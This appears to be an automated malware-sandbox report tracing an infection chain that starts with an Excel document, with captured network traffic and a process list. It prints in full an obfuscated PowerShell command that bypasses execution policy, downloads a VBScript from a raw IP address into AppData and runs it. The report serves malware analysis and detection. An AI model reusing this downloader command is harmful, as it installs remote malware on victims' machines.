                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  7192.168.2.2249175172.217.16.1934433972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-10-31 04:14:35 UTC139OUTGET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1
                                                                                                                                                                                                                  Host: drive.usercontent.google.com
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  2024-10-31 04:14:37 UTC4906INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                  Content-Security-Policy: sandbox
                                                                                                                                                                                                                  Content-Security-Policy: default-src 'none'
                                                                                                                                                                                                                  Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                                                  X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                  Content-Disposition: attachment; filename="new_image-new.jpg"
                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                  Access-Control-Allow-Credentials: false
                                                                                                                                                                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                  Content-Length: 2239109
                                                                                                                                                                                                                  Last-Modified: Mon, 21 Oct 2024 13:42:20 GMT
                                                                                                                                                                                                                  X-GUploader-UploadID: AHmUCY0Eoly_r0wEo4YPvB6pUNZZprl1OUHr5AXBt-Eit5FWkxae8SVfmn-GyGMom_kwcMTHWNEkb_s9SQ
                                                                                                                                                                                                                  Date: Thu, 31 Oct 2024 04:14:37 GMT
                                                                                                                                                                                                                  Expires: Thu, 31 Oct 2024 04:14:37 GMT
                                                                                                                                                                                                                  Cache-Control: private, max-age=0
                                                                                                                                                                                                                  X-Goog-Hash: crc32c=WqxmdA==
                                                                                                                                                                                                                  Server: UploadServer
                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  2024-10-31 04:14:37 UTC4906INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                                                                                                                                  Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                                                                                                                                  2024-10-31 04:14:37 UTC4885INData Raw: 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08 82 7d 8c a8 45 2e de 2f b9 cd 04 62 f1 19 03 ed 55 b5 34 6c 13 99 53 48 aa 43 28 23 68 01 89 e7 9c 98 27 46 81 d1 49 00 1d c6 fb 9c 07 6f 7c 8a 24 76 64 ec a4 5e 15 62 d3 c0 8c e5 e5 24 03 e9 02 c5 62 1a 6d 62 bb 00 cc 14 ad 81 78 71 36 e4 61 be af 8c 0c ad 42 99 26 76 51 44 9a 0a 16 b8 c5 99 19 0d 32 90 7e 23 35 a4 11 b3 15 27 e2 0f 4b e3 17 d4 ed 10 80 24 dc 4f 40 70 33 eb
                                                                                                                                                                                                                  Data Ascii: 8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b^}E./bU4lSHC(#h'FIo|$vd^b$bmbxq6aB&vQD2~#5'K$O@p3
                                                                                                                                                                                                                  2024-10-31 04:14:37 UTC1324INData Raw: 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7 e5 81 e9 07 8b 40 da 67 d5 0f 0e d3 10 ac 29 77 3d 76 04 fe 3e c4 af e7 f0 39 da 6f 1b d3 6a 1c ef d0 c2 18 ad 85 4d ec c4 fc 8b f3 f4 ed ce 61 40 cf 14 91 b0 04 a8 24 15 27 f8 4f 0c 3f 2c a2 b4 b0 b9 da 40 ba b0 c0 30 ef 55 63 b7 be 06 9c de 2d 13 9a 1a 38 a3 b3 cb 29 6b 35 f0 2c 72 ad e3 50 00 36 f8 74 25 bd ed f9 ff 00 c5 99 f3 17 91 43 33 12 d4 7f 11 ba e7 b6 2e 18 b2 d8 8c 00 bf e2 16 0e 06 be b7 c5 22 62 a9 1e 8e 28 db 68 66
                                                                                                                                                                                                                  Data Ascii: #k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*@g)w=v>9ojMa@$'O?,@0Uc-8)k5,rP6t%C3."b(hf
                                                                                                                                                                                                                  2024-10-31 04:14:37 UTC1378INData Raw: 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a ea 53 53 2c 72 6d 0a b1 86 20 1e 7a fe 59 89 11 d7 6a 17 64 26 79 1a e8 90 cc 76 df c7 a0 ca b3 a3 43 24 b3 6a 7f 7b c0 45 ae 4d 77 bf 6c 67 c3 5e 72 fb 20 75 60 80 ca 55 ba 13 44 1f e7 81 53 a2 f1 b4 86 49 8c b3 20 4e 4a 89 da c8 fa 1c 57 45 ac f1 1d 44 a4 c5 aa 76 65 e4
                                                                                                                                                                                                                  Data Ascii: I@*~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{SS,rm zYjd&yvC$j{EMwlg^r u`UDSI NJWEDve
                                                                                                                                                                                                                  2024-10-31 04:14:37 UTC1378INData Raw: b2 c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4 78 ee 01 6e c3 a6 0b f6 84 1a 2f da f4 cd 33 8d 41 69 34 c7 72 a8 51 b7 62 71 ed d3 bf 7b be 3a 66 ef d9 08 53 67 da 44 1a 69 62 f1 18 b4 4e 93 ab 23 16 45 43 10 29 60 05 03 d2 d4 a0 0a af 86 64 7d b5 d6 e9 b5 bf b4 81 3b 23 16 94 69 24 01 db 90 1a 28 d8 0e bf 1c 0d 1f da
                                                                                                                                                                                                                  Data Ascii: cf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#xn/3Ai4rQbq{:fSgDibN#EC)`d};#i$(
                                                                                                                                                                                                                  2024-10-31 04:14:37 UTC1378INData Raw: 0e 51 21 52 69 af da f1 39 f6 b2 96 08 c5 98 50 be d8 58 85 a9 12 bb 31 f7 f6 c0 cc a1 66 dd e6 1f 2c f4 17 81 d1 2f 9b 09 2e a4 b0 e3 e9 8b 3a 3c 4c cd 1d 2a 91 cf 18 c3 29 58 5a 9c d9 3e 9f 96 1e 08 8c b0 82 dc af 42 47 38 19 e1 37 37 ac 6e 1e f8 64 2c ea 50 8b 5a e2 86 72 43 20 d6 98 ca 91 10 e6 f1 98 e2 02 56 0a 59 42 8b 23 df 01 78 b4 e9 01 ad a6 db b0 c3 47 a2 56 90 52 30 0d d6 fb 64 88 77 4d bc c8 dc 9e 06 3a 6d 23 01 59 b7 11 d7 02 87 46 9a 6b 23 93 d3 e9 81 56 57 0c 03 58 06 a8 8e 70 da 98 8b 4d 13 09 58 9a a2 07 f3 c4 91 36 ea 25 46 91 89 bf 4f 15 81 05 48 73 66 fe 99 59 d0 32 6d 65 e4 64 32 32 cc 41 73 f0 bc ba 5b 0d 92 1b 61 d0 d6 02 fa 7d 3a 39 3e 9f 52 f4 38 dc 6b 21 43 bb a8 e9 95 8c 04 52 43 10 df 2c 32 12 50 6d 66 2c 7a fc 30 2f 06 8d a6
                                                                                                                                                                                                                  Data Ascii: Q!Ri9PX1f,/.:<L*)XZ>BG877nd,PZrC VYB#xGVR0dwM:m#YFk#VWXpMX6%FOHsfY2med22As[a}:9>R8k!CRC,2Pmf,z0/
                                                                                                                                                                                                                  2024-10-31 04:14:37 UTC1378INData Raw: 1a 88 d4 12 59 54 13 5b be 27 af c8 e2 ad b4 01 4a 40 bc d0 d5 13 ac 08 c8 d1 88 d5 76 ae f9 94 33 72 c4 96 05 ae c9 e4 7e 43 e2 b0 d3 48 83 99 74 f4 7b 79 e9 ff 00 ab 01 32 29 b9 26 8f b6 16 02 34 ee 25 08 c5 87 2a bb c8 03 e7 44 1f d7 0f f7 49 0c 77 be 02 4f ff 00 6f 4f fd 59 0d a4 95 63 16 d0 90 be d3 23 7e 81 b0 1a 86 59 f5 09 23 43 24 e1 4d 1d cd 2b 11 d0 58 15 c0 b3 fe 20 46 44 5a 83 3b 14 59 a6 89 55 50 bb b4 cc 6c d8 56 ef d3 93 f9 7b 62 09 a7 96 48 77 a3 42 01 3c dc aa a4 8f 88 2c 32 1f 49 22 a9 25 a1 20 2e ea 12 27 4f a3 73 80 ea 99 bc a5 f3 1a 44 2e 18 28 69 18 f2 0a f5 00 93 5c 9e dd 33 33 5c 85 67 60 58 b1 e2 d9 9a cf f7 af 9e 73 bb 36 9c 21 24 aa 12 47 3c 73 5f 9e 2c 78 04 0b a3 c9 27 02 83 83 9a be 16 e9 1c 52 33 90 29 81 e7 e5 99 4a 2c e6
                                                                                                                                                                                                                  Data Ascii: YT['J@v3r~CHt{y2)&4%*DIwOoOYc#~Y#C$M+X FDZ;YUPlV{bHwB<,2I"% .'OsD.(i\33\g`Xs6!$G<s_,x'R3)J,
                                                                                                                                                                                                                  2024-10-31 04:14:37 UTC1378INData Raw: f0 1a af 0a 7d 3c 28 c5 9a 49 e5 7f c2 ab ba 8d 73 df 03 23 cb 74 9c 30 7b 46 1e a5 6e c7 e1 84 49 e5 8c 32 a3 6d 0c a5 58 fb 8b bc 31 d3 ba 30 66 46 a2 0d 6e 15 5d bf a6 09 d8 19 02 81 47 df 03 d0 7d 9e 56 6d 0b d3 6d 01 ec 1f a5 62 bf 68 55 9b 57 a7 0d d7 6f 1f 1f 56 5b c2 35 03 45 0c 9e 71 db 16 e5 36 db af 9b 1c 7e 78 2f 13 d4 47 ac d4 c6 da 76 de 11 4a 9d bb ab df db 03 d0 1d eb a5 2a 59 98 85 6f c5 db e1 9e 7f ec d0 65 9a 72 39 f4 0f e7 9a e7 59 12 e9 49 97 74 67 98 d4 10 c6 cd 7b 7d 33 27 c1 b7 e9 27 73 22 32 ab a8 16 55 b9 eb d0 56 03 3e 3f a7 f3 60 13 85 f5 44 68 ff 00 ba 7f eb 97 d0 f8 ac 6b e1 db a4 3c c4 84 f4 27 75 76 c7 27 96 07 86 45 91 c4 6a ca 08 69 01 0a 77 03 c0 be a7 8c f1 c2 45 86 52 a5 4b c5 7c 7a a8 10 3e 38 1e 8f 45 71 81 23 bb 7d
                                                                                                                                                                                                                  Data Ascii: }<(Is#t0{FnI2mX10fFn]G}VmmbhUWoV[5Eq6~x/GvJ*Yoer9YItg{}3''s"2UV>?`Dhk<'uv'EjiwERK|z>8Eq#}
                                                                                                                                                                                                                  2024-10-31 04:14:37 UTC1378INData Raw: cb ea 1c 74 00 05 ac 0c 9f b3 cc 90 78 d7 da 68 22 d6 ab 38 f0 89 e4 9e 58 dc c8 a1 d4 44 ad d4 72 c4 ee 2c 47 16 c2 bb 67 8a fb 55 10 93 ed ee 9b 50 24 0b 1c c9 a2 0a c1 83 32 8f 22 1f 51 5f c4 07 3d c6 6b 7d 84 d4 3e 8b c6 3e d6 46 92 42 d1 a7 83 6a 9c 79 60 fa 76 95 3b 41 20 1e fc e6 27 db 14 0d f6 bd 1c 39 15 a7 d1 15 63 dc 7d de 2a c0 f4 9f b5 e9 e4 66 fb 3d e6 24 b1 ca 9a 3d 92 ab 22 a8 0d b5 18 f0 39 1c b5 73 ed 9f 39 d3 40 41 2e 25 da c3 e1 9f 58 fd b3 cb a6 6f 1d f0 5d 3e a6 49 04 50 a3 89 5d 41 69 0f 0a 68 02 40 ff 00 47 3e 63 19 73 11 0b 11 65 00 0e 08 04 1b e8 6b eb 80 16 49 4a b2 79 a5 95 81 06 85 60 df 46 15 81 f3 38 35 7e 95 be 3e 39 a4 c9 b9 76 15 28 d5 dc 7f 5c 4e 73 e4 05 56 91 c5 9a e2 bf b6 05 f4 30 9f 35 9c 92 39 b5 0d 44 9b f9 65 f5
                                                                                                                                                                                                                  Data Ascii: txh"8XDr,GgUP$2"Q_=k}>>FBjy`v;A '9c}*f=$="9s9@A.%Xo]>IP]Aih@G>csekIJy`F85~>9v(\NsV059De
                                                                                                                                                                                                                  2024-10-31 04:14:37 UTC1378INData Raw: c0 1d b0 d0 a2 e9 d0 24 67 8e a4 62 b1 6a 36 30 0e 9b bb 59 ca c9 29 56 2c ad c9 e8 30 0c 1d 9a 6a 0e a2 8d 73 91 3f 98 ac a4 b2 d0 3e aa 1d 46 26 67 31 a3 3c 8a a3 6f 37 8a 68 7c 54 6a f5 6e a1 58 93 d2 ff 00 0e 06 b1 71 e6 86 14 01 e3 35 1a 26 01 02 90 40 51 98 a6 46 ad a5 68 8f 61 8f 47 3b be 94 12 18 38 e2 fb d6 03 ee 8a 40 e5 77 03 57 ed 99 72 41 73 19 59 82 95 36 6c f1 8d 39 91 62 57 03 e2 d7 94 79 b7 46 43 42 ac 08 a6 e7 00 12 a4 72 c2 35 01 d6 ec f4 c5 11 d9 e4 6d cc 09 19 da 9d f3 41 22 44 16 26 2a 55 6b b6 28 35 02 2d 54 7a 5a b7 65 b2 c7 e0 30 0b a9 94 45 a9 44 67 1b 4f 38 ea ea 12 29 46 c2 b5 fc 40 e2 7a bd 3a 4e ea d2 2a 8d b5 cd e5 e0 81 5d 4c c4 86 8f a5 8c 0d b6 d5 a0 d3 f9 88 a1 56 bf 2c cc 96 68 e6 f5 07 52 4f c7 13 f1 2d 54 ef a0 91 74
                                                                                                                                                                                                                  Data Ascii: $gbj60Y)V,0js?>F&g1<o7h|TjnXq5&@QFhaG;8@wWrAsY6l9bWyFCBr5mA"D&*Uk(5-TzZe0EDgO8)F@z:N*]LV,hRO-Tt


                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                  Start time:00:13:32
                                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                                                                                                                                  Imagebase:0x13fc50000
                                                                                                                                                                                                                  File size:28'253'536 bytes
                                                                                                                                                                                                                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                                  Start time:00:13:55
                                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                                  Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                                                                                                                                                  Imagebase:0x13faf0000
                                                                                                                                                                                                                  File size:13'824 bytes
                                                                                                                                                                                                                  MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                                  Start time:00:13:58
                                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))"
                                                                                                                                                                                                                  Imagebase:0x13fa80000
                                                                                                                                                                                                                  File size:443'392 bytes
                                                                                                                                                                                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                                  Start time:00:14:00
                                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE
                                                                                                                                                                                                                  Imagebase:0x13fa80000
                                                                                                                                                                                                                  File size:443'392 bytes
                                                                                                                                                                                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                  Start time:00:14:02
                                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.cmdline"
                                                                                                                                                                                                                  Imagebase:0x13fc50000
                                                                                                                                                                                                                  File size:2'758'280 bytes
                                                                                                                                                                                                                  MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                                  Start time:00:14:03
                                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7A10.tmp" "c:\Users\user\AppData\Local\Temp\xcygtrxb\CSC209022CC148748BB8468879EDEB89E99.TMP"
                                                                                                                                                                                                                  Imagebase:0x13ff20000
                                                                                                                                                                                                                  File size:52'744 bytes
                                                                                                                                                                                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                                  Start time:00:14:08
                                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatnewswithgoodthingsonbe.vbs"
                                                                                                                                                                                                                  Imagebase:0xff760000
                                                                                                                                                                                                                  File size:168'960 bytes
                                                                                                                                                                                                                  MD5 hash:045451FA238A75305CC26AC982472367
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                                  Start time:00:14:08
                                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
